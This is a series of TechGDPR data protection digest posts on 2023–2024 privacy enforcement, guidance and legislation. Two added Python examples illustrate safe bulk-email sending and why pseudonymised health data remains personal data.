In the US, following a settlement with Ring, the Federal Trade Commission is returning more than 5.6 million dollars to customers. The company allowed employees and contractors to access consumers’ private videos and failed to implement security protections, enabling hackers to take control of consumers’ accounts, cameras, and videos. Ring also deceived its customers by failing to restrict employees’ and contractors’ access to customers’ videos, and by using customer videos to train algorithms without consent.

Data security

Ransom attack: The EDPB provided a summary of a recent Greek regulator fine where a company (Hellenic Post Services ELTA SA) failed to implement technical and organisational measures, resulting in unauthorised access by third parties. The first incident involved data being encrypted to demand a ransom, the result of a malicious attack by third parties, while the second incident involved the leakage of personal data, which was subsequently published on the Dark Web.

Cybersecurity tool: The UK National Cyber Security Centre issued the latest version of the Cyber Assessment Framework, reflecting the increased threat to critical national infrastructure. The guide is for all organisations responsible for securing critical network and information systems, covering remote access, privileged operations, user access levels and multi-factor authentication (principles B2a and B2c). Other organisations may find this tool useful too.

Strong password rule: In the UK, makers of phones, TVs, and other internet-connected smart devices are now legally required to meet minimum security standards, states the Department for Science, Innovation and Technology. Manufacturers are banned from shipping weak default passwords like ‘admin’ or ‘12345’, and if there is a common password the user will be prompted to change it on start-up.

Big Tech 

Data brokerage: A new data broker restriction was signed into law on 24 April in the US, JDSupra law blog reports. ‘Protecting Americans’ Data from Foreign Adversaries Act of 2024’ prohibits data brokers from sharing sensitive personal information with a broad range of entities that may have ties to Russia, China, Iran, and North Korea. This includes data on finances, genetics, health, biometrics, communication contents, exact geolocation, and data about minors. Any organisation that provides data to another organisation that isn’t serving as a service provider in exchange for a significant fee is known as a “data broker.” 

US TikTok/China row: ByteDance would prefer TikTok be shut down rather than sold if the Chinese owner exhausts its legal options in fighting legislation to ban the platform from US app stores, according to Reuters. The US recently passed legislation allowing for the suspension of the popular service due to widespread concerns that China may access Americans’ data or use the app for spying. TikTok’s major assets include its algorithms, source code, user data, and product operations and management. However, Chinese rules protect TikTok’s intellectual property, making it difficult for US buyers to acquire the source code and similar assets.

“Cookie pledge” fails: As Google delays the demise of third-party cookies, a European Commission campaign to get Big Tech companies to voluntarily commit to a “cookie pledge” has reportedly failed. The draft pledging principles ensure that users receive concrete information on how their data is processed, and the consequences of accepting different types of cookies; consent should not be asked again for a year once it has been refused. Some companies lost interest in the proposal since they depend on data harvesting for income, while others were worried that it would not comply with existing laws. 

The post Data protection digest 18 Apr – 02 May 2024: EU-US redress mechanism and European Health Data Space taking shape appeared first on TechGDPR.

Data protection digest 15 – 31 August 2023: financial data processing, misconducted learning platforms, and algorithmic disgorgement https://techgdpr.com/blog/data-protection-digest-01092023-financial-data-misconducted-learning-platforms-and-algorithmic-disgorgement/ Fri, 01 Sep 2023 08:50:15 +0000

The post Data protection digest 15 – 31 August 2023: financial data processing, misconducted learning platforms, and algorithmic disgorgement appeared first on TechGDPR.

This issue highlights details on financial data processing, the EU Digital Services Act took effect for large online operators, and the US FTC successfully launched “algorithmic disgorgement” via its enforcement.

Legal processes

Financial data: The EDPS discussed recommendations to encourage data sharing to extend the range of available financial services and products, while also giving people or organisations control over the processing of their financial data. Individuals and organisations, according to the proposals, would govern access to their financial data using dashboards offered by financial institutions. Individuals would be able to monitor, limit, or authorize access to their information. Users should be supplied with comprehensive, accurate, and unambiguous information about the financial service provider asking for access to their data. It should also disclose the type of product, payment, or service for which an individual’s data will be utilized, as well as the categories of data required.

Digital Services Act: The Digital Services Act took effect for large online operators serving in the EU on 25 August. 19 platforms and search engines with at least 45 million users must comply with stricter rules concerning data collection, privacy, disinformation, dark patterns, online hate speech and more. This includes a ban on targeted advertising of minors based on profiling, and a ban on targeted advertising using special categories of personal data, such as sexual orientation or religion. Online platforms will be required to redesign their systems and prove they have done so to the European Commission, (including publishing the risk assessments). Additionally, vetted researchers can access the data of those services to conduct analyses on systemic risks in the EU. Smaller platforms will be subject to the same regulation beginning in 2024. They will, however, be supervised by national agencies rather than Brussels. 

Cybersecurity and risk assessment in California: The California Privacy Protection Agency (CPPA) has published its proposed Cybersecurity and Risk Assessment Audit Regulations. According to the CPPA, the formal rulemaking processes for cybersecurity audits, data protection risk assessments, and automated decision-making technologies have yet to begin. These drafts are intended to inform board deliberations and public participation. They provide standards for service providers and contractors, assisting organisations in meeting audit compliance. The regulations state that every business that processes personal information that potentially poses a serious risk to customers’ security must conduct an audit (annually). They also describe the components to be evaluated and the measures to be taken, as summarised by digitalpolicyalert.org.

EU-US Data Privacy Framework: Almost all transmissions of personal data to US-based companies, if they have committed themselves to the certification mechanism, are covered by the EU-US Data Privacy Framework, explains the Bavarian state data protection commissioner. However, for transfers of personal data collected in the context of an employment relationship (‘HR data’), the US business must explicitly state this in its certification. Particular attention must also be paid to onward transfers, for example, if the US processor working for the EU data exporter transmits the personal data to a sub-processor in another third country. The US adequacy decision cannot apply in this situation.

Official guidance

‘Freedom of Information’ and data protection: Guernsey’s data protection commissioner discusses Freedom of Information requests that caused some of the most extraordinary data breaches recently (eg, when details of thousands of police and civilian personnel employed by the Police Service of Northern Ireland were released in error). Freedom of Information generally refers to the right of citizens to access information held by public authorities. In reality, this information will often include personal data about individuals, whether that is staff, citizens or other individuals that the public authorities are in contact with. The rights of all individuals must be considered before any disclosure. If you are a data controller, you must understand your legal obligations concerning data subjects’ rights and have appropriate policies and procedures to ensure they are dealt with properly.

Biometric data: Meanwhile the UK Information Commissioner’s Office is currently consulting on draft guidance on biometric data. This guidance explains how data protection law applies to organisations that use or are considering using biometric recognition systems, and to vendors of these systems. At a glance:

  • You must take a data protection by design approach when using biometric data.
  • You should do a data protection impact assessment before you use a biometric recognition system. This is because using special category biometric data is likely to result in a high risk.
  • Explicit consent is likely to be the only valid condition for processing available to you to process special category biometric data.
  • If you can’t identify a valid condition, you must not use special category biometric data.

Employees’ digital monitoring rules: Digital work tools can record large amounts of data about employees, and therefore monitoring of it is heavily restricted, states the Norwegian privacy regulator. In most cases, the employer does not have the right to monitor the employee’s use of work tools, including the use of the Internet, unless the purpose of the monitoring is to manage the company’s computer network to uncover or clarify security breaches, etc. At the same time, it can be difficult for employers to introduce such measures in particular cases, as many regulations control different aspects of the working environment, and may include trade union approval, transparency obligations, data protection implications, and information security.

Privacy by default: This means that products and services are designed to ensure that a person’s privacy is protected from the outset and that they do not need to take any additional steps to protect their data, explains the Latvian data protection regulator. This approach is designed to minimise possible violations in the process of data acquisition and usage, as well as unauthorised access and the risks that could arise if personal data comes into the possession of a third party. This may include collecting only the minimum necessary data, default settings of the user account (in “private mode”), limited data retention (followed by automatic anonymisation or deletion of user data if the account is inactive for a certain period), user control tools (whether to allow the user profile to be found in search engines, etc), clear information notices (including all third parties with whom the data may be shared), and security measures (encryption, regular security audits).

Enforcement decisions

UiPath data leak: The Romanian data protection authority has fined learning platform UiPath SRL approx. 70,000 euros for a massive data loss. It did not implement adequate technical and organisational measures to ensure that, by default, personal data cannot be accessed without the intervention of a person, including the ability to ensure the ongoing confidentiality and resilience of processing systems and services, as well as a process for regularly testing, assessing and evaluating the effectiveness of implemented measures. This led to the unauthorised disclosure of, and access to, the personal data (user name and surname, the unique identifier, e-mail address, the name of the company where the user was employed, the country and details of the level of knowledge obtained within the courses) of about 600,000 users of the Academy Platform, for about 10 days. This violation is likely to bring physical, material or moral harm to the data subjects, such as the loss of control over their data or the loss of data confidentiality.

Misconfigured cloud storage: The UK Information Commissioner issued a reprimand to a recruitment company: the organisation misconfigured a storage container, with 12,000 records relating to 3,000 workers, to be publicly accessible without any requirement to authenticate. The personal data consisted of a variety of different data sets, including names, addresses, dates of birth, passports, ID documents and national insurance numbers. The company has since committed to periodically audit the configuration of cloud services as part of a wider security assessment including access rights, appropriate identity and access controls, event logging and security monitoring.

Vklass data leak: The Swedish privacy regulator has reprimanded the learning platform Vklass for not being able to detect abnormal user behaviour in its learning platform or to track what happened in the system. Multiple complainants alleged that an unauthorised person obtained personal data about teachers and students from the learning platform. The reports come from municipal committees and private businesses that conduct school and educational activities. The incident probably occurred because a student wrote a script that automatically saved information from the learning platform into a database, and the information was then published openly on a website, which is now closed.

Edmodo and minors’ consent: Meanwhile in the US, the Federal Trade Commission obtained an order against education technology provider Edmodo for collecting personal data from children without obtaining their parents’ consent and using that data for advertising, in violation of the Children’s Online Privacy Protection Act Rule (COPPA), and for unlawfully outsourcing its COPPA compliance responsibilities to schools. Among many orders, the provider is obliged to identify the accounts in question and delete or destroy certain data (from students under 13 years of age), periodically provide compliance reports to the Commission, permanently refrain from collecting more personal information than reasonably necessary for the child to participate in any activity offered on the online platform, etc.

Data security

High-risk systems: For some so-called “critical processing” IT systems, a data breach would create particularly high risks for people. As a result, they require an adequate level of security. To best support the professionals concerned, the French regulator CNIL has submitted a recommendation for public consultation (in French). It specifically targets so-called “critical” processing, defined by the following two cumulative criteria: a) the processing is large-scale within the meaning of the GDPR, and b) a personal data breach could have very significant consequences either for the data subjects, for state security or for society as a whole.

This includes customer databases and other processing that brings together a large part of the population, such as in the energy, transport and banking sectors, large-scale dematerialised public services, health data processing, etc. Risk scenarios may include attacks by organised criminal groups or “supply chain attacks”, likely to take place over a long period; the compromise of third-party service providers responsible for IT development, maintenance or support operations; the exploitation of unknown vulnerabilities in software or hardware components; and the compromise of persons authorised to access the processing.

Email security guidance: Guidance by the UK Information Commissioner explains what organisations should and could do to secure email, including several case studies and a checklist. Even if the content of an email has nothing sensitive in it, showing which people received it could disclose sensitive or confidential information about them. In brief:

  • You must assess what technical and organisational security measures are appropriate to protect personal information when sending bulk emails.
  • You should train staff about security measures when sending bulk communications.
  • You should include in your assessment consideration of whether using secure methods, such as bulk email services or mail merge services, is more appropriate, rather than just relying on a process that uses Blind Carbon Copy.
  • If you are only sending an email to a small number of recipients, you could consider sending each one separately, rather than one bulk email. 
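As an added example (not from the ICO guidance or its case studies), the Python below turns the checklist into a pre-send gate: it counts the recipients that every receiver of a message can see, refuses a bulk message that discloses them, and produces separately addressed copies for a small list. The thresholds, the clinic sample message and the addresses are constructed.

```python
"""Pre-send recipient-disclosure check for bulk email.

Added example, not the ICO's code: a gate that a sending script can run
before handing a message to the mail server. It counts the recipients every
receiver will be able to see (To and Cc), refuses a bulk message that
exposes them, and builds one separately addressed copy per person for a
small list, the alternative the guidance prefers over one bulk email.
"""
from email.message import EmailMessage
from email.utils import getaddresses
from typing import Iterator

# Assumed policy values, not from the guidance: more than one visible
# recipient discloses the list; above SMALL_LIST recipients, relying on Bcc
# alone is judged too error-prone and a bulk email/mail merge service is
# recommended instead.
MAX_VISIBLE = 1
SMALL_LIST = 20


def recipients_in(msg: EmailMessage, *headers: str) -> list[str]:
    """Return the bare, lower-cased addresses found in the named headers."""
    raw: list[str] = []
    for header in headers:
        raw.extend(msg.get_all(header, []))
    return [addr.lower() for _name, addr in getaddresses(raw) if addr]


def check_recipient_disclosure(msg: EmailMessage) -> list[str]:
    """Return the reasons the message must not be sent; [] means it may go.

    To/Cc recipients are shown to everyone, so the list itself is disclosed
    even when the body contains nothing sensitive.
    """
    problems: list[str] = []
    visible = recipients_in(msg, "To", "Cc")
    if len(visible) > MAX_VISIBLE:
        problems.append(
            f"{len(visible)} recipients visible in To/Cc: the recipient "
            "list would be disclosed to every receiver"
        )
    hidden = recipients_in(msg, "Bcc")
    if len(hidden) > SMALL_LIST:
        problems.append(
            f"{len(hidden)} Bcc recipients: use a bulk email or mail merge "
            "service rather than relying on Bcc for a list this size"
        )
    return problems


def split_bulk_message(template: EmailMessage,
                       recipients: list[str]) -> Iterator[EmailMessage]:
    """Yield one copy of template per recipient, addressed only to them.

    Only non-addressing headers are carried over, so a list pasted into the
    template's To or Cc can never leak into the individual copies.
    """
    for rcpt in recipients:
        single = EmailMessage()
        for header in ("From", "Reply-To", "Subject", "Date"):
            if header in template:
                single[header] = template[header]
        single["To"] = rcpt
        single.set_content(template.get_content())
        yield single


def sample_bulk_message() -> EmailMessage:
    """Constructed sample: a reminder where the whole list was put in To."""
    msg = EmailMessage()
    msg["From"] = "reminders@clinic.example"
    msg["Subject"] = "Appointment reminder"
    msg["To"] = ("a.patient@example.com, b.patient@example.com, "
                 "c.patient@example.com")
    msg.set_content("Your appointment is next Tuesday.")
    return msg


if __name__ == "__main__":
    bulk = sample_bulk_message()
    for problem in check_recipient_disclosure(bulk):
        print("BLOCKED:", problem)
    # The fix for a small list: one message per recipient, each of which
    # passes the same check.
    for single in split_bulk_message(bulk, recipients_in(bulk, "To")):
        assert not check_recipient_disclosure(single)
        print("OK to send to", single["To"])
```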

Big Tech

OpenAI for organisations: OpenAI offers its most powerful version of ChatGPT to enterprises. It has longer context windows for processing longer inputs, advanced data analysis capabilities, customisation options and more. According to the company, 80 per cent of Fortune 500 companies, (the largest US corporations), have registered ChatGPT accounts, as determined by accounts associated with corporate email domains. Businesses have expressed concerns about privacy and security, fearing that their data may be used to train ChatGPT and that the application could mistakenly reveal sensitive consumer information to AI models. According to OpenAI, ChatGPT Enterprise users will have complete rights and ownership over their data, which will not be used for algorithm training.

‘Algorithmic disgorgement’: At the same time, the US Federal Trade Commission reminds companies of certain obligations when using Generative AI. When offering a generative AI product, companies need to inform customers whether and the extent to which AI training data includes copyrighted or otherwise protected material. Companies should not try to “fool people” into thinking that AI-generated works were created by humans. Companies must ensure that customers understand the material terms and conditions associated with digital products. The regulator also noted that unilaterally changing terms or undermining reasonable ownership expectations can be problematic, etc. Finally, in its enforcement of data protection regulations, the Commission has lately begun to compel “algorithmic disgorgement” – the destruction of not just the illegally obtained data itself, but also artificial intelligence models and algorithms constructed using such data.

Data protection digest 17 – 30 July 2023: guide on website analytics, health care data sharing, and COPPA 2.0
https://techgdpr.com/blog/data-protection-digest-01082023-guide-on-website-analytics-health-care-data-sharing-and-coppa/ (Wed, 02 Aug 2023)

TechGDPR’s review of international data-related stories from press and analytical reports.

Official guidance

Website analytics: There are many website analytics and tracking tools on the market, notes the Norwegian data protection regulator, but that doesn’t necessarily mean it’s legal to use them on your website. Be prepared to follow the GDPR, even if you do not know the name or identity of those visiting your site. Analytics tools collect a lot of information, which either alone or in combination can constitute personal data. If you currently have an analytics tool that collects information you do not use for anything, you are breaking the law:

  • You must have a legal basis for processing. 
  • There are many requirements for user consent to be valid. The mere existence of the cookie banner is not enough.
  • Choose tools that promise to only process personal data on your behalf and as you decide. 
  • On some websites, the visitors’ behaviour can in itself reveal special categories of personal data, (eg, mental health care).
  • Many service providers have offices or subcontractors in countries outside the EU/EEA. You must check this before using the tool. 
  • Make sure you provide honest and easily understandable information to the visitors, and respect their data subject rights.

Health care data aggregation: The French data protection regulator published recommendations for actors in the digital health sector, (in French). The sandbox projects included federated learning between several health data warehouses, a diagnostic aid solution in oncology, anonymous statistical indicators of populations in medical research, and a therapeutic game. The GDPR states that data processing in the field of health must be implemented in the public interest, a legal basis that can only be relied on by public entities, or legal entities entrusted with a public service mission.

Thus, commercial projects, (start-ups), should be based on their legitimate interests. People’s consent in many cases was also ruled out as the companies are not in a position to collect it, particularly for the reuse of data from healthcare establishments. Finally, whenever non-anonymous data is exported, an ad hoc risk analysis must be performed to determine the necessary security measures. Continuity of security measures outside of the workplace should be ensured as much as possible. 

Customer location data: More retailers and companies are transferring their loyalty programs to mobile applications. These often demand access to the customer’s location-related data to personalise offers for each customer, taking into account their habits and other information. Regardless of the legal basis applied by the merchant for the data processing, (both consent and legitimate interest are possible), the customer has all the rights specified in the GDPR. Completely ceasing the loyalty program if the customer withdraws consent only to the processing of geolocation data will not comply with regulatory requirements. Therefore, when developing an application, it is necessary to take into account different possible levels of the loyalty program, granular consent, and withdrawal.

EdTech development: The French regulator also published a summary of the main recommendations, (in French), based on the “sandbox” project in the EdTech sector. That included actors developing a portfolio of learning skills, a communication solution in the school context, a warehouse of learning traces with a view to their publication and analysis, and a “personal cloud” for students connected to their digital workspace. During the “sandbox” support, among other things, the technical architecture of the solutions was analysed with the data controllers and their subcontractors. It has to be noted that:

  • State establishments, (eg, primary schools), do not have a legal personality; teachers and directors are acting as agents of the administration of national education. 
  • When onboarding a technical solution, the Ministry of national education must be considered as the only data controller, (in joint controllership with the municipality). 
  • The company offering technical solutions would become a subcontractor. 
  • For processing operations that pursue “school” purposes, the legal basis of the “mission of public interest” has been considered the most appropriate to establish.
  • Other treatments may demand individual, (eg, parental) consent. 
  • Only authorised subcontractors and recipients of pupils’ data are allowed. 
  • Information notices must be adapted to different age groups, and more generally to the degree of maturity of the pupils concerned. 

Legal processes and redress

Non-material damage under the GDPR: The Dublin District Court awarded 2000 euros compensation to a plaintiff regarding the use of CCTV footage of him by his employer, which led to victimisation from colleagues, serious embarrassment, and loss of sleep. As part of a meeting involving quality control and other managers and supervisors, CCTV video was displayed to various personnel. The plaintiff was not present at the meeting and found out afterwards that the tape had been utilised. The company’s data protection policies regarding CCTV were not clear or transparent, and no legitimate interest assessment of the remote monitoring of workers had been carried out. Read more details of the case in the original analysis by the Irish lawyers.

US state privacy legislation: The most recent comprehensive state consumer data privacy law has been passed in Oregon. The law has some unique provisions despite being similar to consumer data privacy laws passed in different states. It applies to nonprofit organisations, has broad definitions of covered data, (including categories of sensitive and biometric data, as well as derived data), a smaller HIPAA, (protected health information), carveout, and grants Oregon residents the right to request a list of the third parties to whom controllers disclosed their data, opt-out options and more. Meanwhile, the Colorado Privacy Act has been enforceable since 1 July, making Colorado the third state after California and Virginia to pass a comprehensive privacy law to protect its residents.

COPPA 2.0: Amendments to the Children’s Online Privacy Protection Act, (and the Kids Online Safety Act), have been approved by a Senate Committee. They would close a loophole that lets companies abuse minors’ data with little accountability and makes it hard for the regulator to prove violations. It would be unlawful for a digital service or connected device directed at children or teens to collect, use, disclose to third parties, or compile their data for profiling and targeted marketing unless the operator has obtained the consent of the relevant minor, (“verified parental consent”). Operators must also treat each user as a child or minor unless the content is deemed to be directed at mixed audiences.

Enforcement decisions

Security measures: Open Bank was fined 2.5 million euros by Spain’s data protection regulator for failing to implement a framework to permit encrypted communication. In order to comply with anti-money laundering legislation, the complainant was asked to confirm the origin of funds received in their bank account. However, the only possibility was to provide the information by email, (rather than through a secure direct channel). The information requested by Open Bank is classified as ‘financial data,’ which requires the implementation of strengthened safeguards. The regulator decided that Open Bank had not implemented a data protection strategy from the start, neither before nor during the processing.

In another recent example, the Polish regulator punished a firm to the tune of almost 9000 euros for losing employees and contractors’ personal data in a ransomware attack. The organisation failed to complete a risk assessment, notify the regulator of the breach within 72 hours of becoming aware of it, and notify the data subjects affected by the breach. The regulator also claimed that the company did not comply fully throughout its inquiry. In particular, the company’s communication was frequently inconsistent.

Non-registration with the regulator: Guernsey’s data protection authority is to pursue legal action for failure to register. It is a legal requirement for any organisation, (including sole traders), that handles people’s personal information in the course of its business activities – even if this is just names and addresses – to register with the Guernsey regulator. If you are not sure whether you need to register, there are three clear criteria:

  • You, (whether a sole trader, organisation, business, charity, landlord, business association etc.), are established in the Bailiwick of Guernsey.
  • You are working with personal data, (any information that may identify individual people, such as staff members, your clients, your business contacts, your service users, your tenants etc.), either as a ‘controller’ or a ‘processor’.
  • The activity you are performing is not part of your personal/household affairs.

Non-cooperation with the regulator:  According to Data Guidance, the Polish data protection authority fined a company 8000 euros for failing to cooperate, (Art. 58 of the GDPR). The regulator received a complaint alleging that the firm had improperly shared personal information with a third party. The regulator sent the business several letters demanding further information, including the legal basis and purpose of processing. The organisation, however, did not react to any of the letters. 

Reimbursement app: A one million euro fine was imposed by the Italian privacy regulator on Autostrade per l’Italia (ASPI) for having illegally processed the data of around 100,000 registered users of the toll reimbursement app, called Free to X. The critical issues of the service – which allows the total or partial refund of the cost of the motorway ticket for delays due to construction sites – had been reported by a consumer association. The authority has ascertained that Autostrade plays the role of data controller and not of data processor, as erroneously indicated in the documentation that governs the relationship between ASPI and the company Free to X, which created and manages the app.

Meta behavioural ads:  The Norwegian data protection authority has prohibited Meta from adapting advertising based on monitoring and profiling of users in Norway. The decision comes shortly after the CJEU stated that Meta’s data practices still do not take place legally. When Meta decides which ads you get to see, they also decide which content you don’t get to see. This affects freedom of expression and information in society. There is a danger that behaviour-based marketing reinforces existing stereotypes or that it can lead to unfair discrimination between different groups. Behaviour-based targeting of political advertisements is particularly problematic.

Medical data anonymisation for research: The Italian regulator fined a company for processing the health data of numerous patients, collected from around 7000 general practitioners, without adopting suitable anonymisation techniques. The GPs adhering to the international health research initiative had to add to their management system “Medico 2000” a function, (a “data extractor” add-on), aimed at automatically anonymising patient data and transmitting it to the above company. In fact, the tool only pseudonymised the data assigned to the patients. There was also the erroneous attribution of the role of data controller to the GPs, and therefore the absence of a legal basis for data processing by the company.
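The distinction the regulator drew between pseudonymisation and anonymisation can be checked in code. The following added example is a constructed illustration, not the “data extractor” add-on from the case: a practice export replaces patient identifiers with a keyed hash, and two checks (rebuilding the token-to-name map with the practice’s key, and measuring the smallest group sharing the same birth year and postcode) show why the records remain personal data. The patient records, the key and the choice of quasi-identifiers are all assumed.

```python
"""Pseudonymised is not anonymised: two checks on a health-data export.

Added example and a constructed illustration, not the "data extractor"
add-on from the case. A practice export replaces each patient identifier
with a keyed hash (a token) and drops the name. Check 1 rebuilds the token
to name mapping with the practice's key; check 2 measures how far the
remaining quasi-identifiers still single patients out. Both show why, under
GDPR Art. 4(5), the records remain personal data.
"""
import hashlib
import hmac
from collections import Counter

# Constructed records as held in a GP's management system (not real data).
PATIENTS = [
    {"patient_id": "P-001", "name": "Anna Rossi", "birth_year": 1961,
     "postcode": "20121", "diagnosis": "E11"},
    {"patient_id": "P-002", "name": "Luca Bianchi", "birth_year": 1965,
     "postcode": "20121", "diagnosis": "I10"},
    {"patient_id": "P-003", "name": "Sara Conti", "birth_year": 1968,
     "postcode": "20122", "diagnosis": "E11"},
    {"patient_id": "P-004", "name": "Marco Greco", "birth_year": 1969,
     "postcode": "20122", "diagnosis": "J45"},
]
# Hypothetical key the practice keeps so later exports update the same rows.
PRACTICE_KEY = b"constructed-practice-key"
# Attributes an outsider could know about a patient without the token.
QUASI_IDENTIFIERS = ("birth_year", "postcode")


def token_for(patient_id: str, key: bytes) -> str:
    """Keyed, deterministic hash of the identifier: stable across exports,
    which is exactly what keeps the rows re-linkable."""
    return hmac.new(key, patient_id.encode(), hashlib.sha256).hexdigest()


def pseudonymise(records: list[dict], key: bytes) -> list[dict]:
    """What the export does: drop the name, swap the id for a token."""
    return [
        {"token": token_for(r["patient_id"], key), "birth_year": r["birth_year"],
         "postcode": r["postcode"], "diagnosis": r["diagnosis"]}
        for r in records
    ]


def reidentify(export: list[dict], records: list[dict],
               key: bytes) -> dict[str, str]:
    """Check 1: whoever holds the key maps every token back to a name.

    The key plus the practice's patient list is the 'additional information'
    of Art. 4(5); as long as it exists, the export is only pseudonymised.
    """
    lookup = {token_for(r["patient_id"], key): r["name"] for r in records}
    return {row["token"]: lookup[row["token"]] for row in export}


def min_k(rows: list[dict], quasi: tuple[str, ...]) -> int:
    """Check 2: size of the smallest group sharing the same quasi-identifiers.

    k == 1 means some row is unique on (birth_year, postcode) and can be
    singled out by anyone who knows those two facts, token or no token.
    """
    groups = Counter(tuple(r[q] for q in quasi) for r in rows)
    return min(groups.values())


def generalise(rows: list[dict]) -> list[dict]:
    """Coarsen birth year to its decade and postcode to its first three
    digits; this raises k, but the token still has to go before the data
    could be called anonymous."""
    return [
        {**r, "birth_year": r["birth_year"] // 10 * 10,
         "postcode": r["postcode"][:3]}
        for r in rows
    ]


if __name__ == "__main__":
    export = pseudonymise(PATIENTS, PRACTICE_KEY)
    print("re-linked by key holder:", reidentify(export, PATIENTS, PRACTICE_KEY))
    print("smallest group before generalisation:",
          min_k(export, QUASI_IDENTIFIERS))
    print("smallest group after generalisation:",
          min_k(generalise(export), QUASI_IDENTIFIERS))
```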

Data security

Videoconferencing tool: The EDPS has found that the use of Cisco Webex videoconferencing and related services by the CJEU meets the data protection standards under Regulation 2018/1725 applicable to EU institutions, bodies, offices and agencies. However, the decision is not a general endorsement nor certification of data protection compliance of the videoconferencing services provided by any Cisco Webex entity.  

With regard to technical safeguards, the court confirmed that support information is encrypted in transit, while case attachments are encrypted both in transit and at rest, in order to secure personal data from accidental loss and unauthorised access, use, alteration, and disclosure. The keys for encryption are managed by Cisco. 

The court also took organisational measures to limit or avoid transfers of personal data outside of the EU/EEA: in case Cisco needs to have remote access to the court’s Cisco Webex infrastructure, the DPO of the court, in collaboration with the court network engineers, shall analyse the possible risks for the data subjects and decide on the legitimacy of this access.

Ryanair facial recognition: Privacy advocacy group NOYB filed a complaint against Ryanair, alleging that the airline is violating customers’ data protection rights by using facial recognition to verify their identity when booking through online travel agents. The airline outsources this process to an external company named GetID. This means that customers have to entrust, (by consenting to it), their biometric data to a company they have never heard of or had a contract with. Passengers can avoid it by showing up at the airport at least 2 hours before departure or submitting a form and picture of their passport or national ID card in advance. 

Big Tech

Alexa child accounts and geolocation: The US Federal Trade Commission will require Amazon to overhaul its deletion practices and implement stringent privacy safeguards to settle charges the company violated the Children’s Online Privacy Protection Act and deceived parents and users of the Alexa voice assistant service about its data practices. Amazon claimed it retained children’s voice recordings in order to help it respond to voice commands, allow parents to review them, and improve Alexa’s speech recognition algorithm. 

Among many requirements, Amazon will have to implement a process to identify inactive Alexa child profiles. Following the identification of any inactive child profile, the company shall delete any personal information, (voice recordings and geolocation information), within 90 days, unless the parent requests that such information be retained. Misrepresenting the privacy policies related to geolocation and children’s voice information will also be prohibited.

Amazon Go shops: A recent class action against Amazon in New York over its cashier-less Amazon Go shops was voluntarily terminated for unspecified reasons. Previously, the complaint claimed that Amazon acquired biometric data from customers in violation of a New York City Biometric Identifier Information Statute. According to the complainant, Amazon scanned customers’ hands and illegally uses technologies such as computer vision, deep learning algorithms, and sensor fusion to measure customers’ bodies to identify and monitor where they walked in the shop and what they purchased. The lawsuit demanded 500 dollars for each infraction of the legislation.

Worldcoin biometric verifications: Members of the public in selected locations worldwide are being encouraged to have their eyes scanned as part of a cryptocurrency initiative that tries to identify humans from AI systems via biometric verification. The Worldcoin protocol operates by providing biometrically verified individuals with a digital identity in the form of a Worldcoin token, which promises to be the first crypto token to be issued globally and freely to people simply for being genuine individuals. Users will also receive access to the app, which will allow them to make global payments, purchases, and transfers utilizing digital and traditional currencies. The UK Information Commissioner’s Office commented on the situation: 

  • The organisation must conduct a data protection impact assessment before starting any processing that is likely to result in high risks, such as processing special category biometric data. 
  • Where they identify high risks that they cannot mitigate, they must consult the regulator.
  • The organisation also needs to have a clear lawful basis to process personal data. Where they are relying on consent, this needs to be freely given and capable of being withdrawn without detriment.

Data protection & privacy digest 16 Dec – 2 Jan 2023: US signals intelligence redress mechanism, “dormant” privacy risk assessment, data brokerage
https://techgdpr.com/blog/data-protection-digest-04012023-us-signals-intelligence-redress-mechanism-dormant-privacy-risk-assessment-data-brokerage/ (Wed, 04 Jan 2023)

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes and redress: US signals intelligence redress mechanism, Google search results removal, California consumer privacy rights, Australia Privacy Act review

The US Office of the Director of National Intelligence, (ODNI), published a directive for implementing the signals intelligence redress mechanism created under the proposed EU-US Data Privacy Framework. It is necessary for the implementation of the US adequacy decision which received a green light from the European Commission just before the end of 2022. The directive governs the handling of redress complaints regarding certain signals intelligence activities and outlines the process by which qualifying complaints may be transmitted by an appropriate public authority in a qualifying state. Additionally, the directive outlines the role of the ODNI Civil Liberties Protection Officer with a given complaint: 

In Sweden, the Supreme administrative court rejected the appeal in a case between Google and the Swedish privacy regulator IMY. This means that the judgment gains legal force and that Google must pay a 4.5 million euro fine. In 2020, the IMY charged Google for violating the right to have search results removed. When Google delisted search results the site owner was notified of the webpage and data subject concerned via Search Console, previously Webmaster Tools. But informing the site owner meant that the personal data was used beyond its original purpose, and the information notice was misleading users and restraining them from exercising their right to request removal. 

California consumer privacy rights expanded on 1 January, (but will be enforced from July). In 2020, California voters approved Proposition 24, known as the CPRA, amending some of the older CCPA’s consumer protections and therefore expanding businesses’ obligations. For example, employees, job applicants, owners, directors, officers, and contractors were previously excluded from the definition of “consumer” and had limited data subject access rights. These rights include the ability to opt out of profiling, opt out of targeted/cross-context advertising, opt out of automated decision making, and to limit the use and disclosure of sensitive information. The new law establishes annual privacy risk assessments and cybersecurity audits. Civil lawsuits will also be allowed against companies that fail to take appropriate measures, with potential damages between 100 and 750 dollars per consumer, per incident.

Australian Attorney-General Mark Dreyfus confirmed that the Privacy Act Review has been completed and a final report received by his department. The announcement came shortly after a wave of spectacular data breaches in the Australian corporate sector. The new privacy regime could include a broader definition of personal data, expanded information obligations for organisations, opt-in consent for users, the right to erasure, and increased penalties for serious or repeated data breaches. 

Official guidance: special categories of data, global cookie review, data brokerage, age-appropriate design tests

The Latvian data protection agency DVI issued a reminder of the rules for the lawful processing of special categories of personal data. In addition to complying with the general data protection conditions, controllers must observe that the processing of special categories is prohibited by default, unless one of the following exceptions or justifications applies:

  • a person’s consent, (eg, to receive commercial notices about price discounts for specific goods or services in a pharmacy);
  • social protection rights, (eg, when terminating the employment of a unionised employee, the employer must contact the trade union); 
  • vital interests of a person, (eg, in cases where a person is unconscious and it is necessary to find out his blood group, allergies, etc.);
  • non-profit activity for political, philosophical, religious, or trade union-related purposes, (the personal data is not disclosed outside the said organisation without the consent of the individual);
  • data deliberately made public, (eg, the person has expressed on social networks that they are vegetarian);
  • essential public interests, (eg, information about political party donors must be made public);
  • preventive or occupational medicine, (eg, assessment of the employee’s work capacity, health or social care, or treatment);
  • public health, (eg, to limit the spread of COVID-19);
  • archiving in the public interest, for scientific, historical or statistical purposes.

The French privacy regulator CNIL published guidelines on the commercial use of customer files – data brokerage. Data controllers need to pay attention to the types of data that can be transferred, (only data relating to active customers can be shared), and to obtaining consent from data subjects for the intended transfer, (eg, via an electronic form). The purchaser also must inform the data subjects of the transfer and the source of the data, (the name of the company that sold the customer files), and obtain the data subjects’ consent if it wishes to use their data for electronic commercial prospecting.

